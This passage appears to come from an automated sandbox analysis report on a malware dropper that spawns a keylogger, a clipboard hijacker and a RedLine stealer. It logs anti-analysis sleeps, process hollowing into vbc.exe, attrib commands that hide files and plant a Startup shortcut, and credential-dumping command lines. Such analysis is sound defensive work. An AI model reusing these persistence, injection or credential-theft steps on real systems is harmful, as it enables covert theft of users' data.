                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\SysWOW64\user32dll.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\user32dll.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\user32dll.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\user32dll.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe TID: 1312Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exe TID: 1308Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exe TID: 1316Thread sleep count: 63 > 30
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exe TID: 1316Thread sleep count: 63 > 30
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe TID: 7028Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe TID: 5456Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 712Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 2988Thread sleep time: -120000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 4972Thread sleep time: -140000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6088Thread sleep time: -300000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6272Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6272Thread sleep time: -2100000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 6272Thread sleep time: -100000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exe TID: 1472Thread sleep time: -180000s >= -30000s
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\hhzclipper.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 300000
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 180000
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeWindow / User API: threadDelayed 4869
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeWindow / User API: threadDelayed 709
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeCode function: 0_2_004012D9 rdtsc
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeCode function: 2_2_02770000 sldt word ptr [eax]
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: GetAdaptersInfo,
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: GetAdaptersInfo,
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 120000
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 140000
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 300000
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 100000
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 100000
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeThread delayed: delay time: 180000
                  Source: RedLine.exe, 00000010.00000002.568143056.0000000000AFD000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
                  Source: RedLine.MainPanel-cracked.exe, 00000004.00000002.343858216.00000000009DE000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy9
                  Source: Keylogger.exe, 00000002.00000002.346733504.0000000000E49000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: Keylogger.exe, 00000002.00000002.346733504.0000000000E49000.00000004.00000020.sdmp, netsh.exe, 00000016.00000003.392033076.000001A36A565000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_004161B0 memset,GetSystemInfo,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 28_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeCode function: 0_2_004011CF LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetEnvironmentVariableA,
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeCode function: 0_2_0040119D mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeCode function: 0_2_004011AF mov eax, dword ptr fs:[00000030h]
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeCode function: 0_2_00401AE1 GetCommandLineA,GetModuleHandleA,GetProcessHeap,ExitProcess,
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeCode function: 0_2_004012D9 rdtsc
                  Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\RedLine.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess token adjusted: Debug
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 17_2_02F77B38 LdrInitializeThunk,
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  barindex
                  Allocates memory in foreign processesShow sources
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
                  Injects a PE file into a foreign processesShow sources
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
                  Sample uses process hollowing techniqueShow sources
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: FFFFFFFF
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
                  Writes to foreign memory regionsShow sources
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
                  .NET source code references suspicious native API functionsShow sources
                  Source: Keylogger.exe.0.dr, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                  Source: Keylogger.exe.0.dr, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                  Source: Windows Update.exe.2.dr, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                  Source: Windows Update.exe.2.dr, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                  Source: 2.0.Keylogger.exe.760000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                  Source: 2.0.Keylogger.exe.760000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                  Source: 2.2.Keylogger.exe.760000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                  Source: 2.2.Keylogger.exe.760000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                  Source: WindowsUpdate.exe.17.dr, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                  Source: WindowsUpdate.exe.17.dr, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                  Source: 17.0.Windows Update.exe.d40000.8.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                  Source: 17.0.Windows Update.exe.d40000.8.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                  Source: 17.2.Windows Update.exe.d40000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                  Source: 17.2.Windows Update.exe.d40000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                  Source: 17.0.Windows Update.exe.d40000.0.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                  Source: 17.0.Windows Update.exe.d40000.0.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                  Source: 17.0.Windows Update.exe.d40000.12.unpack, Form1.csReference to suspicious API methods: ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
                  Source: 17.0.Windows Update.exe.d40000.12.unpack, RunPE.csReference to suspicious API methods: ('ReadProcessMemory', 'ReadProcessMemory@kernel32'), ('WriteProcessMemory', 'WriteProcessMemory@kernel32'), ('VirtualProtectEx', 'VirtualProtectEx@kernel32'), ('VirtualAllocEx', 'VirtualAllocEx@kernel32')
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Users\user\AppData\Local\Temp\Keylogger.exe "C:\Users\user\AppData\Local\Temp\Keylogger.exe"
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Users\user\AppData\Local\Temp\hhzclipper.exe "C:\Users\user\AppData\Local\Temp\hhzclipper.exe"
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe "C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe"
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe "C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exe"
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\HOST.bat" "
                  Source: C:\Users\user\Desktop\Hpdyv8oO3j.exeProcess created: C:\Users\user\AppData\Local\Temp\ViRuS.exe "C:\Users\user\AppData\Local\Temp\ViRuS.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
                  Source: C:\Users\user\AppData\Local\Temp\RedLine.MainPanel-cracked.exeProcess created: C:\Users\user\AppData\Roaming\RedLine.exe "C:\Users\user\AppData\Roaming\RedLine.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Windows\system32\user32dll.exe
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe" +r +h +s +a "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2528
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                  Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
                  Source: C:\Users\user\AppData\Local\Temp\ViRuS.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im "ViRuS.exe"
                  Source: C:\Windows\SysWOW64\user32dll.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im "user32dll.exe"
                  Source: hhzclipper.exe, 00000003.00000002.568063483.0000000000D70000.00000002.00020000.sdmp, RedLine.exe, 00000010.00000002.570514509.0000000002AEA000.00000004.00000001.sdmpBinary or memory string: Program Manager
                  Source: hhzclipper.exe, 00000003.00000002.568063483.0000000000D70000.00000002.00020000.sdmp, ViRuS.exe, RedLine.exe, 00000010.00000002.568694026.0000000001130000.00000002.00020000.sdmp, user32dll.exe, 00000013.00000000.354827611.0000000000401000.00000020.00020000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: RedLine.exe, 00000010.00000002.568091160.0000000000AE0000.00000004.00000020.sdmpBinary or memory string: Program ManageressMgmt
                  Source: hhzclipper.exe, 00000003.00000002.568063483.0000000000D70000.00000002.00020000.sdmp, RedLine.exe, 00000010.00000002.568694026.0000000001130000.00000002.00020000.sdmpBinary or memory string: Progman
                  Source: RedLine.exe, 00000010.00000002.568091160.0000000000AE0000.00000004.00000020.sdmpBinary or memory string: Program Managerssions5H
                  Source: hhzclipper.exe, 00000003.00000002.568063483.0000000000D70000.00000002.00020000.sdmp, RedLine.exe, 00000010.00000002.568694026.0000000001130000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\Keylogger.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
